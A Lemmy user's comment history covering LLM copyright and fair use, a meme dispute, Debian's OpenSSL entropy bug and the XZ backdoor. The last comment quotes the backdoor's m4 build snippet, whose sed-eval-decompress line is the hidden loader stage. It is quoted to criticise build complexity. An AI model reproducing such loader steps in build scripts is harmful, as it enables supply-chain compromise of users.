• 0 Posts
  • 16 Comments
Joined 1 year ago
cake
Cake day: June 14th, 2023

help-circle
  • Yeah, you are not gonna be able to do that with an LLM. They will be able to quote only some passages, and only of popular books that have been quoted often enough.

    You entirely ignored this part.

    You basically proved my point in doing so, BTW. You cannot do what you claimed with an LLM. And I’m not saying, and I never said before “ChatGPT” or “OpenAI”. I don’t understand why you think that I might be “defending these hypocritical companies”, when I literally said the opposite at the end.

    You are entirely fooled by the output of ChatGPT and you are not arguing in good faith (or you are entirely unable to understand what I said).

    Edit/addendum: And to stress out my point, given that the person to whom I’ve replied to showed the output of ChatGPT as if it were any kind of proof, this is what other LLMs say. This is 4o mini:

    Large Language Models (LLMs) like me do not have the ability to quote whole sections of copyrighted texts verbatim. While I can generate text based on patterns and information learned during training, I do not store or recall specific texts or books. Instead, I can provide summaries, analyses, or discuss themes and concepts related to a book without directly quoting it. If you have a specific topic or question in mind, feel free to ask!

    And this is Llama 3.1 70B:

    Large Language Models (LLMs) can generate text based on the patterns and structures they’ve learned from their training data, which may include books. However, whether they can quote whole sections of a book depends on several factors.

    LLMs are typically trained on vast amounts of text data, including books, articles, and other sources. During training, they learn to recognize patterns, relationships, and context within the text. This allows them to generate text that is similar in style and structure to the training data.

    However, LLMs do not have the ability to memorize or store entire books or sections of text. Instead, they use the patterns and relationships they’ve learned to generate text on the fly.

    That being said, it’s possible for an LLM to generate text that is very similar to a section of a book, especially if the book is well-known or widely available. This can happen in a few ways:

    1. Overlapping patterns: If the book’s writing style, structure, or content is similar to other texts in the training data, the LLM may be able to generate text that resembles a section of the book.
    2. Memorization of key phrases: LLMs may memorize key phrases, quotes, or passages from the training data, which can be recalled and used in generated text.
    3. Contextual generation: If the LLM is given a prompt or context that is similar to a section of the book, it may be able to generate text that is similar in content and style.

    However, it’s unlikely that an LLM can quote a whole section of a book verbatim, especially if the section is long or contains complex or unique content. The generated text may be similar, but it will likely contain errors, omissions, or variations that distinguish it from the original text.

    Feel free to give them a shot in: https://duck.ai



  • Now I sail the high seas myself, but I don’t think Paramount Studios would buy anyone’s defence they were only pirating their movies so they can learn the general content so they can produce their own knockoff.

    We don’t know exactly how they source their data (and that is definitely shady), but if I can gain access to a movie in a legal way, I don’t see why I would not be able to gather statistics from said movie, including running a speech to text model to caption it, then make statistics of how many times a few words were used, and followed by which ones. This is an oversimplified explanation of what a LLM does, but it’s the fairest I can come up, and it would be legal to do so. The models are always orders of magnitude smaller than the data they are trained on.

    That said, I don’t imply that I’m happy with the state of high tech companies, the AI hype, the energy consumption, or the impact on the humble people. But I’ve put a lot of thought into this (and learning about machine learning for real), and I think this is not a ML problem, but a problem in the economic, legal and political system. AI hype is just a symptom.



  • But then it does go on to quote materials verbatim, which shows it’s not “just” ‘extracting patterns’.

    Is is just extracting patterns. Is making statistical samples of which token (“word”, informally speaking) is likely followed given the previous stream.

    It can only reproduce passages of things it has seen many, many times. I cannot reproduce the whole work. Those two quotes can be seen elsewhere on the internet plenty of times. And it’s fair use there, so it would be fair use with a chat bot as well.

    There have been papers published where researchers were able to regenerate an image that was present in the training set of Stable Diffusion. But they were only able to find that image (and others) in particular, because they were present in the training set multiple times, and the caption was the same (it was the portrait picture of some executive at a company).

    when given the book and pages — quote copyrighted works

    Yeah, you are not gonna be able to do that with an LLM. They will be able to quote only some passages, and only of popular books that have been quoted often enough.

    Even if they started to use my service to literally copy entire books?

    You cannot do that with an LLM.

    Why are you defending massive corporations who could just pay up? Isn’t the whole “corporations putting profits over anything” thing a bit… seen already?

    I hate that some corporations are burning money, resources and energy on this, and the solution is not to restrict fair use even further. Machine Learning is complex, but if I had to summarize in some way is “just” gathering statistics of which word comes next (in the case of a text model). This is no different than getting a large corpus of text, and sample it for word frequency, letter frequency, N-gram frequency, etc. It is well known that this is fair use. You only store the copyrighted works to run the software and produce a very transformative work that is a summary many orders of magnitude smaller than the copyrighted work. This is fair use, and it should still be. Changing that is gonna harm the public, small companies and independent researchers way more than big tech companies.

    As I said in another comment, I would very much welcome a way to force big corpos to release their models. Make a model bigger than N parameters? You needed too much fair use in one gulp: your model has to be public, and in the public domain. I would fucking welcome that! But going in the opposite direction is just risky.

    I don’t understand why small individuals think that copyright is their friend, and will protect them from big tech companies. Copyright will always harm the weak and protect the powerful as a net result. It’s already a miracle that we can enjoy free software and culture by licenses that leverage copyright in our favor.


  • “Theft” is never a technically accurate word when dealing with the so called “intellectual property”, because the digital content being copied without authorization is legal in tons of cases, and because, come on, property is very explicitly exclusive. I cannot copy my house or my car, but I can make copies of my works for virtually 0 cost.

    Using data for training ML models is even explicitly allowed in some jurisdictions (e.g. Japan), and is likely to be fair use everywhere else. LLMs are very transformative, and while they often can produce verbatim copies of fragments of copyrighted works, they don’t store the whole works or significant pieces of them.

    Don’t get me wrong, I don’t like big companies making big money. I would not mind a law that would force models to be open sourced. But restricting them to train their models on public data by restricting fair use, it would harm them very little (they could pay something if they are making some profit), while small researchers or companies would never be able to compete, because they would not have the upfront costs, nor the economic engineering to disguise profits and pay less.


  • Also preemptively deciding that me disagreeing with you automatically makes you right because you predicted your explanation wouldn’t satisfy me is just A-tier bullshit.

    I predicted that I would waste my time by replying to you, and I predicted right.

    I wanted to give it a chance, though, because Lemmy is a place that is friendly enough and that I want to thrive, despite how little I contribute. I tried to be constructive and explain things the best I could, and assume the best possible faith, etc. When you just say that I sound like an asshole, and completely act in bad faith in how russian roulette is supposed to be in the context of someone who says “you can beat me at any game”, now I feel the urge to try the block feature in Lemmy, sorry.


  • Two people go on a date. The date is going well, there is chemistry between the two people. One says “if you beat me at any game we can have sex”. The two people will typically play a board or card game, and will flirt with the opportunity of sex during the game play, which is gonna be fun and exciting. Seems a good plot idea for your average romantic comedy movie or teenager’s series.

    Now the joke is that the choice of game is stupid because you end up killing your date. Just with that you could make a meme/joke. Now the post is doubling down on the stupidity, insanity, etc., by making it morbid and showing that the guy still had sex with the corpse.

    Here it is. My take on the issue, which is unlikely to be the only possible explanation which is not “incel shit”. I’ve wasted 10 minutes of my time, and you’ll likely will still not agree with me, and will prove valid my first comment.

    Cheers.


  • suy@programming.devtoLemmy Shitpost@lemmy.worldWinner's Luck
    link
    fedilink
    arrow-up
    15
    arrow-down
    2
    ·
    6 months ago

    Has it occurred to you that pressing the downvote button is just much easier that having to bother explaining something that should be obvious?

    If it is not obvious to you that it’s not incel shit, maybe even after an explanation you won’t agree still because you have different views (which I’m not saying are not respectable, but are still different, so an agreement can’t be reached), so whoever replies to you would have wasted their time.

    So of course people downvote without replying.


  • suy@programming.devtoFunny@sh.itjust.worksHolland has so much space
    link
    fedilink
    arrow-up
    3
    arrow-down
    5
    ·
    edit-2
    7 months ago

    Normally the good jokes are also somewhat smart, even though they are not “serious”. A joke about Texas being big is not very smart, IMHO. Is also not very original, as it’s not the first one I’ve seen in this vein. And above all, it’s specially stupid to end it with a remark about “The European mind cannot comprehend this”, because Europeans know a lot more about the US than the US people know about Europe.

    IOW, it’s not that it’s struck a nerve, it’s that it was legit bad.

    PS: Oh, and, the fact that it appeals to Europeans, it seems like it appeals on Europe as a whole, which makes it doubly stupid, because then individual members of the EU/continent are like USA states, and then each member/state has routes as long as the one in the original meme.


  • I’d have to dig it, but I think it said that it added the PID and the uninitialized memory to add a bit more data to the entropy pool in a cheap way. I honestly don’t get how that additional data can be helpful. To me it’s the very opposite. The PID and the undefined memory are not as good quality as good randomness. So, even without Debian’s intervention, it was a bad idea. The undefined memory triggered valgrind, and after Debian’s patch, if it weren’t because of the PID, all keys would have been reduced to 0 randomness, which would have probably raised the alarm much sooner.


  • no more patching fuzzers to allow that one program to compile. Fix the program

    Agreed.

    Remember Debian’s OpenSSL fiasco? The one that affected all the other derivatives as well, including Ubuntu.

    It all started because OpenSSL did add to the entropy pool a bunch uninitialized memory and the PID. Who the hell relies on uninitialized memory ever? The Debian maintainer wanted to fix Valgrind errors, and submitted a patch. It wasn’t properly reviewed, nor accepted in OpenSSL. The maintainer added it to the Debian package patch, and then everything after that is history.

    Everyone blamed Debian “because it only happened there”, and definitely mistakes were done on that side, but I surely blame much more the OpenSSL developers.


  • suy@programming.devtoLinux@lemmy.mlXZ backdoor in a nutshell
    link
    fedilink
    arrow-up
    40
    arrow-down
    1
    ·
    8 months ago

    Is it, really? If the whole point of the library is dealing with binary files, how are you even going to have automated tests of the library?

    The scary thing is that there is people still using autotools, or any other hyper-complicated build system in which this is easy to hide because who the hell cares about learning about Makefiles, autoconf, automake, M4 and shell scripting at once to compile a few C files. I think hiding this in any other build system would have been definitely harder. Check this mess:

      dnl Define somedir_c_make.
      [$1]_c_make=`printf '%s\n' "$[$1]_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
      dnl Use the substituted somedir variable, when possible, so that the user
      dnl may adjust somedir a posteriori when there are no special characters.
      if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
        [$1]_c_make='\"$([$1])\"'
      fi
      if test "x$gl_am_configmake" != "x"; then
        gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
      else
        gl_[$1]_config=''
      fi